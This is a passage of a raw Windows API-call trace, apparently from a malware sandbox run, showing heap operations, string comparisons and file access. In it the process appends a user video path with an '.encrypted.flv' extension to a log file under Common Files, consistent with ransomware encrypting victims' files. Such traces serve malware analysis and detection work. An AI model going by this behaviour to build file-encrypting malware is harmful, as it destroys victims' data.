hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.879] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.879] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.879] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.879] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.880] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3976, lpOverlapped=0x0) returned 1 [0043.880] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3976, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.encrypted.flv\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0043.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x54) returned 0x794b90 [0043.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.encrypted.flv\r\n", cchWideChar=84, lpMultiByteStr=0x794b90, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.encrypted.flv\r\n", lpUsedDefaultChar=0x0) returned 84 [0043.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0043.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0043.881] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x53, lpOverlapped=0x0) returned 1 [0043.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0043.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.881] CloseHandle (hObject=0x128) returned 1 [0043.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.885] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.885] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.885] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.885] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.886] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.888] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 